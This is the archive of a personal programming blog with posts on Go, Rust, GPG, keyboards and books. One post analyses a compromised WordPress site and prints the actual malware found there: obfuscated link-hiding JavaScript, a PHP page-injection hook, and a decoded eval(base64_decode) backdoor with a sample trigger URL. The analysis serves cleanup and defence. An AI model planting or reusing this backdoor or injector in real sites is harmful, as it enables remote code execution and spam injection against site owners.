March 1, 2014

Three best programming books

Posted in Software at 23:19 by graham

Here are my three favorite programming books, the ones I consider most important and would most recommend. There’s a good list on Stack Overflow too, if you prefer the wisdom of crowds to the wisdom of me.

Code Complete, Steve McConnell

This is the book that took me from enthusiastic amateur to professional. It covers the programming-in-the-small that you will do every day for the rest of your career: Naming variables, writing for loops, that type of thing. I know, you know how to write a for loop already.

This book will make you better at the small things.

Code Complete: A Practical Handbook of Software Construction

The Art of Unix Programming, Eric S. Raymond

It took me a very long time to read this book. I would pick it up, get a few pages in, have an epiphany, and go re-write some things.

Unix is the only constant in our world. The programming language you use will change many times, the tools you use will change all the time, and even SQL is not as much of a constant as it once was. But Unix will always be there for you. Improving your Unix knowledge is the single best investment you can make as a programmer.

But this is not just a book about Unix. It’s a book about the philosophy of Unix, about The Way, and it intends to bring you enlightenment in the Zen Buddhism sense.

For me at least, it did.

The Art of UNIX Programming

The Linux Programming Interface, Michael Kerrisk

This is the Linux grimoire, the spell book with all the spells. It’s over $60, 1500 pages, and you must never get it wet or read it after midnight.

Pretty much everything interesting you do in Linux (open a file, write to a socket, start a process, sleep, allocate memory, everything) is a syscall. This book is all the syscalls, and extensive information around them.

It will answer all your questions.

The Linux Programming Interface: A Linux and UNIX System Programming Handbook

December 12, 2013

Go: How slices grow

Posted in Software at 05:49 by graham

In Go (golang) what happens to memory when you append to a slice?

If there’s enough space in the slice’s backing array, the element just gets added. If there’s not enough space, a new array is allocated, all the items are copied over, and the new item is added at the end. The interesting part is allocating that new array. And here’s the answer:

Go slices grow by doubling until size 1024, after which they grow by 25% each time

This is an implementation detail and may change. The above is correct for Go 1.1 and 1.2.

Try it out:

package main

import "fmt"

func main() {
    var x []int  // nil slice; append treats it like make([]int, 0)
    for i := 0; i < 100; i++ {
        fmt.Printf("%d: %p cap %d\n", i, x, cap(x))
        x = append(x, i)
    }
}
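The growth rule quoted above can also be written down as a small function. This is only a sketch of the rule as stated for Go 1.1 and 1.2, not the runtime’s code: nextCap is a made-up name, the real runtime also rounds the result up to an allocator size class, and newer Go releases use a different formula, so the capacities printed by the program above may not match on a current toolchain.

```go
package main

import "fmt"

// nextCap models the rule described in the post (hypothetical helper, not a
// runtime function): double while the slice is small, then grow by 25%.
func nextCap(oldCap, needed int) int {
	if oldCap == 0 {
		return needed
	}
	newCap := oldCap
	for newCap < needed {
		if newCap < 1024 {
			newCap *= 2
		} else {
			newCap += newCap / 4
		}
	}
	return newCap
}

func main() {
	// Simulate appending one element at a time and print each reallocation.
	capacity := 0
	for length := 1; length <= 2000; length++ {
		if length > capacity {
			capacity = nextCap(capacity, length)
			fmt.Printf("len %d -> cap %d\n", length, capacity)
		}
	}
}
```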

Read the rest of this entry »

December 7, 2013

Kinesis Advantage after four months

Posted in Software at 23:58 by graham

I have been using a Kinesis Advantage keyboard for the past four months, since August. I love it. Here’s my trip report.


Before this keyboard I had been using Microsoft Natural keyboards for many many years.

Let’s cut straight to the chase: The first three days were very hard. It’s the same feeling as when I switched to vim. You tell your fingers to do something and they don’t do it. It’s especially hard when you do lots of text chat. My typing rate went way down, so I couldn’t ‘talk’ as fast.

Read the rest of this entry »

October 22, 2013

Realtime Conf 2013: Favorite talks

Posted in Software at 05:33 by graham

Realtime Conf 2013 just finished in Portland. It was an unusual conference in many ways. The “production values” and effort the &yet team put into it were simply astounding. The conference included, amongst others, a book, a play, a marching band, boxes of dirt, meth samples, and a beautiful song (skip to 3:50).

All the videos are online. These are my three favorite:

Isaac Schlueter: Leadership and open source: Also known as “Z”, he is the main author of npm and leader of the node.js community. He teaches leadership in tweets, around a core philosophy of empathy, compassion, and grit. If your life involves having to interact with humans, I’d recommend this talk.

Ilya Grigorik: Making HTTP realtime with HTTP 2.0: HTTP 2.0 is the next version of HTTP. It is based on SPDY. It could be ready as early as next year. And it’s way cool.

Eric Rescorla: What WebRTC is good for: He wrote much of Firefox’s WebRTC implementation, and some of Chrome’s, so if you want to learn about WebRTC, watch this.

The best part for me was the conversations (especially with the XMPP folks) and how generous everyone was with their time and explanations.

September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy-hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

[Screenshot: pharma-links]

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated JavaScript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….
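To see what the script writes without running it in a browser, the same decoding can be done offline. Here is a minimal sketch in Go: it joins the digit strings, reads them three digits at a time, subtracts 70, and treats each result as a character code, which is what the JavaScript loop does. The function and variable names are mine, not part of the malware.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// sample holds the second element of each _gw7.push(...) call, in order.
var sample = []string{
	"1301851861911781711021861911821711311041861711901861171",
	"6918518510413211616817818117316919116917817116518219318",
	"2181185175186175181180128167168185181178187186171129169",
	"1781751821281841711691861101221211261821901141671871861",
	"8111416718718618111412212112618219011112919513011718518",
	"6191178171132",
}

// decode joins the parts, splits the result into three-digit groups, and
// turns each group into a character after subtracting offset.
func decode(parts []string, offset int) (string, error) {
	digits := strings.Join(parts, "")
	if len(digits)%3 != 0 {
		return "", fmt.Errorf("digit count %d is not a multiple of 3", len(digits))
	}
	var out strings.Builder
	for pos := 0; pos < len(digits); pos += 3 {
		code, err := strconv.Atoi(digits[pos : pos+3])
		if err != nil {
			return "", err
		}
		out.WriteRune(rune(code - offset))
	}
	return out.String(), nil
}

func main() {
	css, err := decode(sample, 70)
	if err != nil {
		panic(err)
	}
	fmt.Println(css)
}
```

For the strings above this prints the style tag shown earlier.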

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is that the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') call reads a value from the database; the code then reverses it, unserializes it, and injects it into the page. The name of the option changes; presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged-in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table, that _iconfeed1 option contains the JavaScript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some WordPress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.
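Here is a small sketch of why a plain search misses the reversed value, and how reversing the search term finds it. The stored string is a made-up stand-in, not the real option value, and reverse works on runes where PHP’s strrev works on bytes (the two agree for ASCII).

```go
package main

import (
	"fmt"
	"strings"
)

// reverse returns s with its characters in the opposite order.
func reverse(s string) string {
	r := []rune(s)
	for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
		r[i], r[j] = r[j], r[i]
	}
	return string(r)
}

func main() {
	// Hypothetical payload, stored reversed the way the option value was.
	stored := reverse(`<a href="http://example.com/pills">pills</a>`)

	fmt.Println(strings.Contains(stored, "href"))          // false: the obvious search misses it
	fmt.Println(strings.Contains(stored, reverse("href"))) // true: search for "ferh" instead
}
```

So when grepping a database dump for injected markup, it’s worth searching for the reversed needle as well.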

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell they wrote to wp_options. An svn diff of the WordPress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those files? Oh, you’re in for a treat – here are the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variable names clearly taken from a word list. Most of them didn't seem to run; they were missing variables and a closing php tag. For analysis, here's a full one (minus php tag) that did run, and that I've hacked around to display its output: obfuscated php (To understand it look for 'hello').

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));)

That takes base64-encoded PHP code in either a URL parameter or a cookie (the $_SERVER lookup means a custom HTTP request header works too), and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==
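If you do find a request like that in your access logs, you can recover the PHP the attacker ran by decoding the parameter. A minimal sketch, assuming the payload arrived as a URL parameter (a cookie or header would not be logged); payloadFromURL is a name I made up:

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
)

// payloadFromURL pulls the named query parameter out of a logged request URL
// and base64-decodes it, returning the PHP source the back door would eval.
func payloadFromURL(rawURL, param string) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err
	}
	encoded := u.Query().Get(param)
	if encoded == "" {
		return "", fmt.Errorf("parameter %q not present", param)
	}
	decoded, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	return string(decoded), nil
}

func main() {
	logged := "http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw=="
	php, err := payloadFromURL(logged, "b02005f9ffdf8")
	if err != nil {
		panic(err)
	}
	fmt.Println(php)
}
```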

Who did it? How?

Who did it? In the Apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own WordPress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated JavaScript, which was written into the database by base 64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Black Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about this, please let me know in the comments, and I’ll update the post. Thanks!

July 30, 2013

How GPG works: Encrypt

Posted in Software at 22:02 by graham

Here’s what happens when you encrypt a message with GPG / GnuPG (and probably other OpenPGP implementations):

  1. Generate session key

    When you encrypt a file to someone (-r person on the command line), GPG generates a session key, which is a large random number. You can see it when you decrypt a message:

    gpg --show-session-key myfile.gpg
    
  2. Choose a symmetric cipher

    GPG then looks at the recipient’s public key to find their preferred symmetric cipher. If you have my key on your ring (get it by doing gpg --recv-keys 0x127CFCD9B3B929D2) you can see my preferred symmetric cipher by typing:

    gpg -r graham -e --verbose test.txt
    

    It should be AES256.

  3. Encrypt using chosen cipher and generated session key

    Next it compresses then encrypts the file using the session key and the preferred cipher. So far, everything is symmetric encryption.

  4. Encrypt session key with public key

    Finally it encrypts that session key using the recipient’s public key (using RSA), and prepends the result to the message. If there are several recipients, this step is repeated once for each person.
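The four steps above can be sketched with Go’s standard library. This is an illustration of the hybrid scheme only, not GPG’s implementation: the output is not OpenPGP-compatible, AES-GCM and RSA-OAEP are stand-ins I picked for the cipher mode and key wrapping, and the function names are made up. It returns the wrapped key and the message body separately instead of prepending one to the other.

```go
package main

import (
	"bytes"
	"compress/flate"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"io"
)

// encrypt follows the four steps in the list (illustrative names and modes).
func encrypt(pub *rsa.PublicKey, plaintext []byte) (wrappedKey, body []byte, err error) {
	// 1. Generate a session key: 32 random bytes.
	sessionKey := make([]byte, 32)
	if _, err = rand.Read(sessionKey); err != nil {
		return nil, nil, err
	}
	// 2. Choose a symmetric cipher. A 32-byte key selects AES-256.
	block, err := aes.NewCipher(sessionKey)
	if err != nil {
		return nil, nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, nil, err
	}
	// 3. Compress, then encrypt with the session key.
	var compressed bytes.Buffer
	zw, err := flate.NewWriter(&compressed, flate.DefaultCompression)
	if err != nil {
		return nil, nil, err
	}
	if _, err = zw.Write(plaintext); err != nil {
		return nil, nil, err
	}
	if err = zw.Close(); err != nil {
		return nil, nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err = rand.Read(nonce); err != nil {
		return nil, nil, err
	}
	body = gcm.Seal(nonce, nonce, compressed.Bytes(), nil) // nonce || ciphertext
	// 4. Encrypt the session key with the recipient's public key.
	wrappedKey, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, sessionKey, nil)
	return wrappedKey, body, err
}

// decrypt reverses the steps: unwrap the session key, decrypt, decompress.
func decrypt(priv *rsa.PrivateKey, wrappedKey, body []byte) ([]byte, error) {
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrappedKey, nil)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(sessionKey)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(body) < gcm.NonceSize() {
		return nil, fmt.Errorf("message too short")
	}
	nonce, ciphertext := body[:gcm.NonceSize()], body[gcm.NonceSize():]
	compressed, err := gcm.Open(nil, nonce, ciphertext, nil)
	if err != nil {
		return nil, err
	}
	return io.ReadAll(flate.NewReader(bytes.NewReader(compressed)))
}

// roundTrip makes a throwaway key pair and runs a message through both halves.
func roundTrip(msg string) (string, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return "", err
	}
	wrappedKey, body, err := encrypt(&priv.PublicKey, []byte(msg))
	if err != nil {
		return "", err
	}
	out, err := decrypt(priv, wrappedKey, body)
	return string(out), err
}

func main() {
	out, err := roundTrip("hello, session key")
	fmt.Println(out, err)
}
```

Only the short session key goes through the slow public-key operation; the message itself is handled by the fast symmetric cipher. For several recipients you would repeat step 4 once per public key and keep a single encrypted body.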

The passphrase GPG asks for when decrypting or signing a message has nothing to do with message encryption. It is only used to symmetrically encrypt your private key (default is CAST5 cipher). That’s in case someone steals your private key file. In terms of how GPG works, you can ignore the passphrase. If you just encrypt a message (without signing it) you won’t need to enter your passphrase at all (but in practice you should always sign your messages).

July 21, 2013

Online upgrades in Go

Posted in Software at 05:40 by graham

tl;dr Send your socket fd over a UNIX domain socket: syscall/passfd_test.go.

When your server holds long running connections (WebSocket, long-running HTTP, IRC, XMPP, etc) you often want to be able to upgrade the server without dropping the connections (zero downtime upgrade). In UNIX there are at least two ways to do this:

  1. Inherit the file descriptor
  2. Send the file descriptor over a domain socket

The first one is straightforward, because a UNIX process automatically inherits the file descriptors of its parent, except if they have the close-on-exec flag set. Go complicates things a bit by always setting that flag on its sockets (in net/sock_cloexec.go). For a child process to inherit its parent’s file descriptors, you have to manually add them to ExtraFiles in os/exec/Cmd. There’s an example in TestExtraFiles in os/exec/exec_test.go.

Usually you need to send more than just the connections to the child process. There will be some state, and probably a communication where the child tells the parent it’s ready to take over (after priming its cache, for example). Hence the second approach, unix domain sockets, is more interesting.
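Here is a minimal sketch of the second approach using the syscall package. To keep it self-contained it runs in one process: it creates a socket pair, sends the read end of a pipe across it as SCM_RIGHTS data, and reads from the descriptor that comes out the other side. In a real upgrade the two ends of the socket would be in the old and new server processes and the descriptor would be a network connection. The function names are mine, and this assumes Linux or another UNIX.

```go
package main

import (
	"fmt"
	"io"
	"os"
	"syscall"
)

// sendFd passes an open descriptor over a UNIX domain socket. The descriptor
// travels as ancillary (SCM_RIGHTS) data next to one byte of ordinary data.
func sendFd(sock, fd int) error {
	return syscall.Sendmsg(sock, []byte{0}, syscall.UnixRights(fd), nil, 0)
}

// recvFd receives one descriptor sent by sendFd.
func recvFd(sock int) (int, error) {
	buf := make([]byte, 1)
	oob := make([]byte, syscall.CmsgSpace(4)) // room for one 32-bit descriptor
	_, oobn, _, _, err := syscall.Recvmsg(sock, buf, oob, 0)
	if err != nil {
		return -1, err
	}
	msgs, err := syscall.ParseSocketControlMessage(oob[:oobn])
	if err != nil {
		return -1, err
	}
	if len(msgs) != 1 {
		return -1, fmt.Errorf("expected 1 control message, got %d", len(msgs))
	}
	fds, err := syscall.ParseUnixRights(&msgs[0])
	if err != nil {
		return -1, err
	}
	if len(fds) != 1 {
		return -1, fmt.Errorf("expected 1 descriptor, got %d", len(fds))
	}
	return fds[0], nil
}

// passPipe sends a pipe's read end across a socket pair, then checks that the
// received descriptor refers to the same pipe by reading msg back through it.
func passPipe(msg string) (string, error) {
	pair, err := syscall.Socketpair(syscall.AF_UNIX, syscall.SOCK_STREAM, 0)
	if err != nil {
		return "", err
	}
	defer syscall.Close(pair[0])
	defer syscall.Close(pair[1])

	r, w, err := os.Pipe()
	if err != nil {
		return "", err
	}
	defer r.Close()
	defer w.Close()

	if err := sendFd(pair[0], int(r.Fd())); err != nil {
		return "", err
	}
	fd, err := recvFd(pair[1])
	if err != nil {
		return "", err
	}
	received := os.NewFile(uintptr(fd), "received-pipe")
	defer received.Close()

	if _, err := w.WriteString(msg); err != nil {
		return "", err
	}
	buf := make([]byte, len(msg))
	if _, err := io.ReadFull(received, buf); err != nil {
		return "", err
	}
	return string(buf), nil
}

func main() {
	out, err := passPipe("still connected")
	fmt.Println(out, err)
}
```

The receiver gets a new descriptor number that refers to the same open file, which is why the connection survives the handover.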

Read the rest of this entry »

May 2, 2013

We are all polyglots

Posted in Software at 17:24 by graham

I used to know two programming languages at any one time: what I called a serious language and what I called a scripting language. My initial serious language was C, my scripting language was Perl. The serious language was for client work, it paid the bills. The scripting language was for tools and toys (which is why many early web-apps were Perl CGI scripts).

We’ve been replacing C as our serious language since the 70s. C++ mostly succeeded, and became the official language of Microsoft Windows. Objective-C got a solid niche when Apple chose it for OS X, and later iOS. Java became the serious language of web apps, and is now the language of Android. The two recent exciting developments here are Go and Rust.

In scripting-language world, Perl was largely replaced by Python and Ruby, and for web-app work by PHP.

So by now my serious language was Java, and my scripting language Python. But then three interesting things happened.

Read the rest of this entry »

April 26, 2013

Rust: What I learnt so far

Posted in Software at 22:58 by graham

This applies to 0.7pre; many things have changed in 0.8. In particular, core was renamed to std, and std renamed to extra.

Rust is an open-source programming language being developed mostly by Mozilla. Its goal is the type of applications currently written in C++ (such as Firefox). Details at the Rust Wikipedia page.

I’ve been learning bits of it the past few days, and whilst Rust is still rough around the edges there’s a lot to enjoy. Rust is only at v0.7pre and changing daily, so you may have to adjust some of the code here.

Rust is a big language, and unless you come from C++ it will probably make your head hurt. In a good way :-)

The two most helpful introductions I have found so far are:

I’d encourage you to run through both of those, starting with Rust for Rubyists. When you get stuck reading one of them (and you will), switch back here.

Contents:

Install

At time of writing Rust is v0.7pre:

Read the rest of this entry »

March 26, 2013

PyCon 2013: My two favorite talks

Posted in Software at 16:41 by graham

PyCon is an annual gathering of Python programmers. All the talks are recorded and distributed freely on the web. My two favorite talks were:
